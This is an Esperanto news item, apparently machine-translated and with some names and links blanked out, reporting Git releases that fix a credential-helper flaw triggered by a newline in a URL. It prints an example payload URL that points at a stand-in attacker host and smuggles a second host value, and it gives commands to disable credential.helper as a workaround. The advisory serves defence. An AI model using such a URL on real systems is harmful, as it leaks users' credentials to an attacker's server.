korektaj eldonoj de la distribua fontkontrolsistemo Git 2.26.1, 2.25.3, 2.24.2, 2.23.2, 2.22.3, 2.21.2, 2.20.3, 2.19.4, 2.18.3 kaj 2.17.4, en kiu eliminis () en la prizorganto "", kiu kaŭzas akreditaĵojn esti senditaj al la malĝusta gastiganto kiam git-kliento aliras deponejon uzante speciale formatitan URL enhavantan novlinian signon. La vundebleco povas esti uzata por aranĝi ke akreditaĵoj de alia gastiganto estu senditaj al servilo kontrolita de la atakanto.
Kiam oni specifas URL kiel "https://evil.com?%0ahost=github.com/", la akredit-traktilo kiam li konektas al la gastiganto evil.com transdonos la aŭtentikigparametrojn specifitajn por github.com. La problemo okazas dum farado de operacioj kiel "git-klono", inkluzive de prilaborado de URL-oj por submoduloj (ekzemple, "git submodule update" aŭtomate prilaboros la URL-ojn specifitajn en la dosiero .gitmodules de la deponejo). La vundebleco estas plej danĝera en situacioj kie programisto klonas deponejon sen vidi la URL, ekzemple, kiam oni laboras kun submoduloj, aŭ en sistemoj kiuj faras aŭtomatajn agojn, ekzemple, en pakaĵkonstruaj skriptoj.
Por bloki vundeblecojn en novaj versioj pasante novlinian signon en iuj valoroj transdonitaj per la protokolo de interŝanĝo de akreditaĵoj. Por distribuoj, vi povas spuri la liberigon de pakaj ĝisdatigoj sur la paĝoj , , , , , , .
Kiel solvo por bloki la problemon Ne uzu credential.helper kiam vi aliras publikajn deponejojn kaj ne uzu "git clone" en "--recurse-submodules" reĝimo kun nekontrolitaj deponejoj. Por tute malŝalti la pritraktilon credential.helper, kiu faras kaj preni pasvortojn de , protektata aŭ dosieron kun pasvortoj, vi povas uzi la komandojn:
git config --unset credential.helper
git config --global --unset credential.helper
git config --system --unset credential.helper
fonto: opennet.ru